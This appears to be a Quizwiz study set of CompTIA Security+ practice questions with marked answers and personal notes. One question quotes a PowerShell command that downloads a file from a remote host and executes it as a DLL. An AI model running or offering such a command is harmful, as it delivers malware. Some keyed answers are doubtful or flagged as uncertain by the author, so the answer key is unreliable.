Security+

¡Supera tus tareas y exámenes ahora con Quizwiz!

During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The penetration tester stops the test to inform the client of the findings. Which of the following should be the client's NEXT step to mitigate the issue?

A. Conduct a full vulnerability scan to identify possible vulnerabilities. B. Perform containment on the critical servers and resources.** C. Review the firewall and identify the source of the active connection. D. Disconnect the entire infrastructure from the internet.

An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document's contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

A. Cryptomalware B. Hash substitution C. Collision** (hash collision) D. Phishing

A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?

A. Customers' dates of birth B. Customers' email addresses C. Marketing strategies** D. Employee salaries

An application developer accidentally uploaded a company's code-signing certificate private key to a public web server. The company is concerned about malicious use of its certificate. Which of the following should the company do FIRST?

A. Delete the private key from the repository. B. Verify the public key is not exposed as well. C. Update the DLP solution to check for private keys. D. Revoke the code-signing certificate.**

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

A. Dual supply B. Generator (might be answer on test if not UPS) C. UPS** (Uninterruptible power supply) D. POU E. Daily backups

Which of the following supplies non-repudiation during a forensics investigation?

A. Dumping volatile memory contents first B. Duplicating a drive with dd C. Using a SHA-2 signature of a drive image** (Secure Hash Algorithm) D. Logging everyone in contact with evidence E. Encrypting sensitive data

Server administrators want to configure a cloud solution so that computing memory and processor usage is maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

A. Dynamic resource allocation** B. High availability C. Segmentation D. Container security

A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?

A. EAP B. TLS C. HTTPS D. AES** (Could be A?)

Which of the following documents provides expectations at a technical level for quality, availability, and responsibilities?

A. EOL B. SLA** C. MOU D. EOSL

An employee received a word processing file that was delivered as an email attachment. The subject line and email content enticed the employee to open the attachment. Which of the following attack vectors BEST matches this malware?

A. Embedded Python code B. Macro-enabled file** C. Bash scripting D. Credential-harvesting website

A penetration tester is brought on site to conduct a full attack simulation at a hospital. The penetration tester notices a WAP that is hanging from the drop ceiling by its cabling and is reachable. Which of the following recommendations would the penetration tester MOST likely make given this observation?

A. Employ a general contractor to replace the drop-ceiling tiles. B. Place the network cabling inside a secure conduit. C. Secure the access point and cabling inside the drop ceiling.** D. Utilize only access points that have internal antennas

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?

A. Employ different techniques for server- and client-side validations B. Use a different version control system for third-party libraries C. Implement a vulnerability scan to assess dependencies earlier on SDLC** (Software Development Life Cycle) D. Increase the number of penetration tests before software release

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned that servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Choose two.)

A. 135 B. 139** (SMB uses 139, 445) C. 143 D. 161 E. 443 F. 445** (SMB uses 139, 445)

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager use to control the network traffic?

A. A DMZ B. A VPN C. A VLAN D. An ACL** (access control list)

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.** B. A PowerShell code is displaying a picture. C. A PowerShell code is configuring environmental variables. D. A PowerShell code is changing Windows Update settings.

While checking logs, a security engineer notices a number of end users suddenly downloading files with the .tar.gz extension. Closer examination of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?

A. A RAT was installed and is transferring additional exploit tools.** (remote access trojan) B. The workstations are beaconing to a command-and-control server. C. A logic bomb was executed and is responsible for the data transfers. D. A fileless virus is spreading in the local network environment

A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls. Which of the following should be implemented to BEST address the CSO's concerns? (Choose two.)

A. A WAF B. A CASB** (Cloud Access Security Brokers) C. An NG-SWG** (Next Gen Secure Web Gateway) D. Segmentation E. Encryption F. Containerization

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would MOST likely have prevented this breach?

A. A firewall B. A device pin C. A USB data blocker** D. Biometrics

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

A. A non-disclosure agreement B. Least privilege C. An acceptable use policy D. Offboarding**

Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?

A. A phishing email stating a cash settlement has been awarded but will expire soon B. A smishing message stating a package is scheduled for pickup C. A vishing call that requests a donation be made to a local charity D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime A

After multiple on premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

A. CASB** (Cloud Access Security Broker) B. VPC C. SWG D. CMS

The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS applications to be blocked from user access. Which of the following is the BEST security solution to reduce this risk?

A. CASB** (Cloud Access Security Broker) B. VPN concentrator C. MFA D. VPC endpoint

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

A. CASB** (Cloud Access Security Broker) B. WAF C. Load balancer D. VPN

An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the organization MOST likely implement?

A. CBT B. NDA** C. MOU D. AUP

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

A. CIS benchmarks** (Center of Internet Security) B. GDPR guidance C. Regional regulations D. ISO 27001 standards

Which of the following employee roles is responsible for protecting an organization's collected personal information?

A. CTO B. DPO** (Data Protection Officer) C. CEO D. DBA

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization's vulnerabilities. Which of the following would BEST meet this need?

A. CVE B. SIEM C. SOAR D. CVSS** (Common Vulnerability Scoring System)

Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?

A. CVSS** (Common Vulnerability Scoring System) B. SIEM C. SOAR D. CVE

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

A. CYOD B. MDM C. COPE D. VDI**

A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Choose two.)

A. Chain of custody B. Tags C. Reports D. Time stamps** E. Hash values F. Time offset**

Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?

A. Chain of custody** B. Legal hold C. Event log D. Artifacts

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to protect the PC from malicious files on the storage device?

A. Change the default settings on the PC. B. Define the PC firewall rules to limit access. C. Encrypt the disk on the storage device.** D. Plug the storage device in to the UPS.

During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should a security analyst perform FIRST to prevent this from occurring again?

A. Check for any recent SMB CVEs. B. Install AV on the affected server. C. Block unneeded TCP 445 connections.** D. Deploy a NIDS in the affected subnet.

A security analyst was called to investigate a file received directly from a hardware manufacturer. The analyst is trying to determine whether the file was modified in transit before installation on the user's computer. Which of the following can be used to safely assess the file?

A. Check the hash of the installation file.** B. Match the file names. C. Verify the URL download location. D. Verify the code signing certificate.

A help desk technician receives an email from the Chief Information Officer (CIO) asking for documents. The technician knows the CIO is on vacation for a few weeks. Which of the following should the technician do to validate the authenticity of the email?

A. Check the metadata in the email header of the received path in reverse order to follow the email's path.** B. Hover the mouse over the CIO's email address to verify the email address. C. Look at the metadata in the email header and verify the ג€From:ג€ line matches the CIO's email address. D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents,

Which of the following is the MOST relevant security check to be performed before embedding third-party libraries in developed code?

A. Check to see if the third party has resources to create dedicated development and staging environments. B. Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository. C. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries' developers.** D. Read multiple penetration-testing reports for environments running software that reused the library.

A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it. Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the following should the company do to help accomplish this goal?

A. Classify the data. B. Mask the data. C. Assign the application owner. D. Perform a risk analysis. A

Which of the following documents provides guidance regarding the recommended deployment of network security systems from the manufacturer?

A. Cloud control matrix B. Reference architecture** C. NIST RMF D. CIS Top 20

Which of the following should be monitored by threat intelligence researchers who search for leaked credentials?

A. Common Weakness Enumeration B. OSINT C. Dark web** D. Vulnerability databases

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would BEST meet this need?

A. Community** B. Private C. Public D. Hybrid

An organization implemented a process that compares the settings currently configured on systems against secure configuration guidelines in order to identify any gaps. Which of the following control types has the organization implemented?

A. Compensating B. Corrective C. Preventive** D. Detective

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario?

A. Compensating B. Deterrent C. Preventive** D. Detective

Multiple business accounts were compromised a few days after a public website had its credentials database leaked on the Internet. No business emails were identified in the breach, but the security team thinks that the list of passwords exposed was later used to compromise business accounts. Which of the following would mitigate the issue?

A. Complexity requirements B. Password history** C. Acceptable use policy D. Shared accounts

Which of the following is a benefit of including a risk management framework into an organization's security approach?

A. It defines expected service levels from participating supply chain partners to ensure system outages are remediated in a timely manner. B. It identifies specific vendor products that have been tested and approved for use in a secure environment. C. It provides legal assurances and remedies in the event a data breach occurs. D. It incorporates control, development, policy, and management activities into IT operations.**

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees' concerns?

A. Enable the remote-wiping option in the MDM software in case the phone is stolen. B. Configure the MDM software to enforce the use of PINs to access the phone.** C. Configure MDM for FDE without enabling the lock screen. D. Perform a factory reset on the phone before installing the company's applications.

A company suspects that some corporate accounts were compromised. The number of suspicious logins from locations not recognized by the users is increasing. Employees who travel need their accounts protected without the risk of blocking legitimate login requests that may be made over new sign-in properties. Which of the following security controls can be implemented?

A. Enforce MFA when an account request reaches a risk threshold.** B. Implement geofencing to only allow access from headquarters. C. Enforce time-based login requests that align with business hours. D. Shift the access control scheme to a discretionary access control.

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022 B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022 C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022 ** D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Which of the following techniques eliminates the use of rainbow tables for password cracking?

A. Hashing B. Tokenization C. Asymmetric encryption D. Salting**

Which of the following can be used by a monitoring tool to compare values and detect password leaks without providing the actual credentials?

A. Hashing B. Tokenization C. Masking D. Encryption A

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

A. High availability B. Application security C. Segmentation D. Integration and auditing**

Which of the following will increase cryptographic security?

A. High data entropy** B. Algorithms that require less computing power C. Longer key longevity D. Hashing

An attacker browses a company's online job board attempting to find any relevant information regarding the technologies the company uses. Which of the following BEST describes this social engineering technique?

A. Hoax B. Reconnaissance** C. Impersonation D. Pretexting

A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources. Which of the following risks would this training help to prevent?

A. Hoaxes B. SPIMs** C. Identity fraud D. Credential harvesting

Which of the following social engineering attacks BEST describes an email that is primarily intended to mislead recipients into forwarding the email to others?

A. Hoaxing** B. Pharming C. Watering-hole D. Phishing

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

A. IDS solution B. EDR solution C. HIPS software solution D. Network DLP solution**

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

A. IPSec** B. SFTP C. SRTP D. LDAPS E. S/MIME F. SSL VPN**

Which of the following organizations sets frameworks and controls for optimal security configuration on systems?

A. ISO B. GDPR C. PCI DSS D. NIST**

A company is implementing BYOD and wants to ensure all users have access to the same cloud-based services. Which of the following would BEST allow the company to meet this requirement?

A. IaaS B. PaaS C. MaaS D. SaaS**

To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST accommodate the request?

A. IaaS B. PaaS (could be also) C. DaaS D. SaaS**

Which of the following BEST describes when an organization utilizes a ready-to-use application from a cloud provider?

A. IaaS B. SaaS** C. PaaS D. XaaS

A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking. Which of the following cloud service provider types should the business engage?

A. IaaS** B. PaaS C. XaaS D. SaaS

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account.Which of the following does this action describe?

A. Insider threat** B. Social engineering C. Third-party risk D. Data breach

Which of the following is an example of risk avoidance?

A. Installing security updates directly in production to expedite vulnerability fixes B. Buying insurance to prepare for financial loss associated with exploits C. Not installing new software to prevent compatibility errors** D. Not taking preventive measures to stop the theft of equipment

Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing application?

A. Intellectual property theft B. Elevated privileges C. Unknown backdoor** D. Quality assurance

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion B. Review reports C. Log reviews D. Threat feeds**

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?

A. Intranet B. Screened subnet C. VLAN segmentation** D. Zero Trust

An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection mechanism to deter malicious activities. Which of the following is being implemented?

A. Proximity cards with guards B. Fence with electricity C. Drones with alarms D. Motion sensors with signage**

A cloud service provider has created an environment where customers can connect existing local networks to the cloud for additional computing resources and block internal HR applications from reaching the cloud. Which of the following cloud models is being used?

A. Public B. Community C. Hybrid** D. Private

Which of the following terms describes a broad range of information that is sensitive to a specific organization?

A. Public B. Top secret C. Proprietary** D. Open-source

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

A. Pulverizing B. Overwriting** C. Shredding D. Degaussing

An organization is building backup server rooms in geographically diverse locations. The Chief Information Security Officer implemented a requirement on the project that states the new hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of the following should the systems engineer consider?

A. Purchasing hardware from different vendors** B. Migrating workloads to public cloud infrastructure C. Implementing a robust patch management solution D. Designing new detective security controls

Which of the following is an example of transference of risk?

A. Purchasing insurance** B. Patching vulnerable servers C. Retiring outdated applications D. Application owner risk sign-off

Which of the following is the BEST example of a cost-effective physical control to enforce a USB removable media restriction policy?

A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports B. Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced** C. Placing systems into locked, key-controlled containers with no access to the USB ports D. Installing an endpoint agent to detect connectivity of USB and removable media

A Chief Security Officer is looking for a solution that can provide increased scalability and flexibility for back-end infrastructure, allowing it to be updated and modified without disruption to services. The security architect would like the solution selected to reduce the back-end server resources and has highlighted that session persistence is not important for the applications running on the back-end servers. Which of the following would BEST meet the requirements?

A. REVERSE PROXY B. Automated patch management C. Snapshots D. NIC teaming A

A penetration tester is fuzzing an application to identify where the EIP of the stack is located on memory. Which of the following attacks is the penetration tester planning to execute?

A. Race-condition B. Pass-the-hash C. Buffer overflow** D. XSS

A SOC operator is receiving continuous alerts from multiple Linux systems indicating that unsuccessful SSH attempts to a functional user ID have been attempted on each one of them in a short period of time. Which of the following BEST explains this behavior?

A. Rainbow table attack B. Password spraying** C. Logic bomb D. Malware bot

During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server. Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain a presence in the network. In which of the following stages of the Cyber Kill Chain is the adversary currently operating?

A. Reconnaissance B. Command and control** C. Actions on objective D. Exploitation

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

A. Reconnaissance B. Impersonation C. Typosquatting** D. Watering-hole

Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?

A. Recovery B. Deterrent C. Corrective D. Detective**

A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how future incidents can be avoided. During which of the following stages of the response process will this activity take place?

A. Recovery B. Identification C. Lessons learned** D. Preparation

A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?

A. Red-team exercise B. Capture-the-flag exercise C. Tabletop exercise** D. Phishing exercise

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A. Redundancy B. RAID 1+5 C. Virtual machines** D. Full backups

An organization has hired a red team to simulate attacks on its security posture. Which of the following will the blue team do after detecting an IoC?

A. Reimage the impacted workstations. B. Activate runbooks for incident response.** C. Conduct forensics on the compromised system. D. Conduct passive reconnaissance to gather information.

After returning from a conference, a user's laptop has been operating slower than normal and overheating, and the fans have been running constantly. During the diagnosis process, an unknown piece of hardware is found connected to the laptop's motherboard. Which of the following attack vectors was exploited to install the hardware?

A. Removable media B. Spear phishing C. Supply chain D. Direct access**

Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a stronger preventative access control. Which of the following would BEST complete the engineer's assignment?

A. Replacing the traditional key with an RFID key B. Installing and monitoring a camera facing the door C. Setting motion-sensing lights to illuminate the door on activity D. Surrounding the property with fencing and gates A

A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which of the following should be performed FIRST?

A. Retention B. Governance C. Classification** D. Change management

A Chief Security Officer is looking for a solution that can reduce the occurrence of customers receiving errors from back-end infrastructure when systems go offline unexpectedly. The security architect would like the solution to help maintain session persistence. Which of the following would BEST meet the requirements?

A. Reverse proxy B. NIC teaming* C. Load balancer* D. Forward proxy

A security analyst has identified malware spreading through the corporate network and has activated the CSIRT. Which of the following should the analyst do NEXT?

A. Review how the malware was introduced to the network. B. Attempt to quarantine all infected hosts to limit further spread.** C. Create help desk tickets to get infected systems reimaged. D. Update all endpoint antivirus solutions with the latest updates.

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company's servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

A. Revoke the code signing certificate used by both programs.** B. Block all unapproved file hashes from installation C. Add the accounting application file hash to the allowed list. D. Update the code signing certificate for the approved application.

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be secure. Which of the following can be used?

A. S/MIME B. LDAPS C. SSH (Secure Shell) D. SRTP C

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are: • www.company.com (main website) • contactus.company.com (for locating a nearby location) • quotes.company.com (for requesting a price quote) The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN B. Wildcard** C. Extended validation D. Self-signed

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the MOST acceptable?

A. SED** (self-encrypting drive) B. HSM C. DLP D. TPM (trusted platform module)

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the secure alternatives for replacing them? (Choose three.)

A. SFTP, FTPS B. SNMPv2, SNMPv3** C. HTTP, HTTPS** D. TFTP, FTP E. SNMPv1, SNMPv2 F. Telnet, SSH** G. TLS, SSL H. POP, IMAP I. Login, rlogin

A recent security breach exploited software vulnerabilities in the firewall and within the network management solution. Which of the following will MOST likely be used to identify when the breach occurred through each device?

A. SIEM correlation dashboards** B. Firewall syslog event logs C. Network management solution login audit logs D. Bandwidth monitors and interface sensors

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor MOST likely be required to review and sign?

A. SLA B. NDA** (proprietary) C. MOU D. AUP

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics. Which of the following should the organization consult for the exact requirements for the cloud provider?

A. SLA** B. BPA C. NDA D. MOU

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches. Which of the following is the security analyst MOST likely observing?

A. SNMP traps B. A Telnet session** (weak encryption and plain text) C. An SSH connection D. SFTP traffic

A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a security analyst to have this ability?

A. SOAR B. SIEM** C. Log collectors D. Network-attached storage

A recent phishing campaign resulted in several compromised user accounts. The security incident response team has been tasked with reducing the manual labor of filtering through all the phishing emails as they arrive and blocking the sender's email address, along with other time-consuming mitigation actions. Which of the following can be configured to streamline those tasks?

A. SOAR playbook** (Automation= SOAR) B. MDM policy C. Firewall rules D. URL filter E. SIEM data collection

Which of the following are common VoIP-associated vulnerabilities? (Choose two.)

A. SPIM B. Vishing C. Hopping D. Phishing E. Credential harvesting F. Tailgating B/E

A user received an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this case?

A. SPIM B. Vishing C. Spear phishing D. Smishing**

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs. Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts. B. SSH was turned off instead of modifying the configuration file.** (SCP uses same port as SSH, port 22) C. Remote login was disabled in the networkd.conf instead of using the sshd.conf. D. Network services are no longer running on the NAS.

Which of the following uses SAML for authentication? (Security Assertion Markup Language)

A. TOTP B. Federation** C. Kerberos D. HOTP

An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?

A. TPM** B. CA C. SAML D. CRL

Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?

A. TTP B. OSINT C. SOAR** (Security Operations Automation and Response) D. SIEM

An organization has developed an application that needs a patch to fix a critical vulnerability. In which of the following environments should the patch be deployedLAST?

A. Test B. Staging C. Development D. Production**

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs** B. The web server logs C. The SIP traffic logs D. The SNMP logs

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

A. The Diamond Model of Intrusion Analysis B. CIS Critical Security Controls C. NIST Risk Management Framework** D. ISO 27002

An organization is migrating several SaaS applications that support SSO. The security manager wants to ensure the migration is completed securely. Which of the following application integration aspects should the organization consider before focusing into underlying implementation details? (Choose two.)

A. The back-end directory source B. The identity federation protocol** C. The hashing method D. The encryption method E. The registration authority F. The certificate authority** (covers encryption and hashing)

Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the following will the company MOST likely reference for guidance during this change?

A. The business continuity plan** B. The retention policy C. The disaster recovery plan D. The incident response plan

During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which of the following BEST explains this reasoning?

A. The forensic investigator forgot to run a checksum on the disk image after creation. B. The chain of custody form did not note time zone offsets between transportation regions. C. The computer was turned off, and a RAM image could not be taken at the same time. D. The hard drive was not properly kept in an antistatic bag when it was moved.

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator use to restore services to a secure state?

A. The last incremental backup that was conducted 72 hours ago B. The last known-good configuration C. The last full backup that was conducted seven days ago** D. The baseline OS configuration

A systems analyst is responsible for generating a new digital forensics chain-of-custody form. Which of the following should the analyst include in this documentation? (Choose two.)

A. The order of volatility B. A CRC32 checksum C. The provenance of the artifacts** D. The vendor's name E. The date and time** F. A warning banner

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST likely reason for this finding?

A. The required intermediate certificate is not loaded as part of the certificate chain.** B. The certificate is on the CRL and is no longer valid. C. The corporate CA has expired on every server, causing the certificate to fail verification. D. The scanner is incorrectly configured to not trust this certificate when detected on the server.

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a single firewall?

A. Transit gateway** B. Cloud hot site C. Edge computing D. DNS sinkhole

A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26. The ChiefInformation Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following describes this type of alert?

A. True negative B. True positive C. False positive D. False negative C

Which of the following tools is effective in preventing a user from accessing unauthorized removable media?

A. USB DATA BLOCKER B. Faraday cage C. Proximity reader D. Cable lock A

Which of the following is a risk that is specifically associated with hosting applications in the public cloud?

A. Unsecured root accounts B. Zero-day C. Shared tenancy** D. Insider threat

A security analyst is concerned about critical vulnerabilities that have been detected on some applications running inside containers. Which of the following is theBEST remediation strategy?

A. Update the base container Image and redeploy the environment. B. Include the containers in the regular patching schedule for servers. C. Patch each running container individually and test the application. D. Update the host in which the containers are running.** (Unclear?)

A security analyst is working on a project to implement a solution that monitors network communications and provides alerts when abnormal behavior is detected. Which of the following is the security analyst MOST likely implementing?

A. Vulnerability scans B. User behavior analysis** C. Security orchestration, automation, and response D. Threat hunting

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

A. WAF B. CASB** (Cloud Access Security Broker) C. VPN D. TLS (Transport Layer Security)

During a security incident investigation, an analyst consults the company's SIEM and sees an event concerning high traffic to a known, malicious command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which of the following can provide this information?

A. WAF logs B. DNS logs** C. System logs* D. Application logs

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows: *Must be able to differentiate between users connected to WiFi *The encryption keys need to change routinely without interrupting the users or forcing reauthentication *Must be able to integrate with RADIUS *Must not have any open SSIDs Which of the following options BEST accommodates these requirements?

A. WPA2-Enterprise** B. WPA3-PSK C. 802.11n D. WPS

A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?

A. WPA3 B. AES C. RADIUS D. WPS** (Wifi Protected Setup, very insecure)

A security engineer must deploy two wireless routers in an office suite. Other tenants in the office building should not be able to connect to this wireless network.Which of the following protocols should the engineer implement to ensure the STRONGEST encryption?

A. WPS B. WPA2** (strongest) C. WAP D. HTTPS

The Chief Information Security Officer (CISO) of a bank recently updated the incident response policy. The CISO is concerned that members of the incident response team do not understand their roles. The bank wants to test the policy but with the least amount of resources or impact. Which of the following BEST meets the requirements?

A. Warm site failover B. Tabletop walk-through** C. Parallel path testing D. Full outage simulation

Which of the following describes the continuous delivery software development methodology?

A. Waterfall B. Spiral C. V-shaped D. Agile**

Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

A. Watering hole** B. Typosquatting C. Hoax D. Impersonation

Which of the following statements BEST describes zero-day exploits?

A. When a zero-day exploit is discovered, the system cannot be protected by any means. B. Zero-day exploits have their own scoring category in CVSS. C. A zero-day exploit is initially undetectable, and no patch for it exists.** D. Discovering zero-day exploits is always performed via bug bounty programs.

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team** B. Purple team C. Green team D. Blue team E. Red team

When implementing automation with IoT devices, which of the following should be considered FIRST to keep the network secure?

A. Z-Wave compatibility B. Network range C. Zigbee configuration** D. Communication protocols

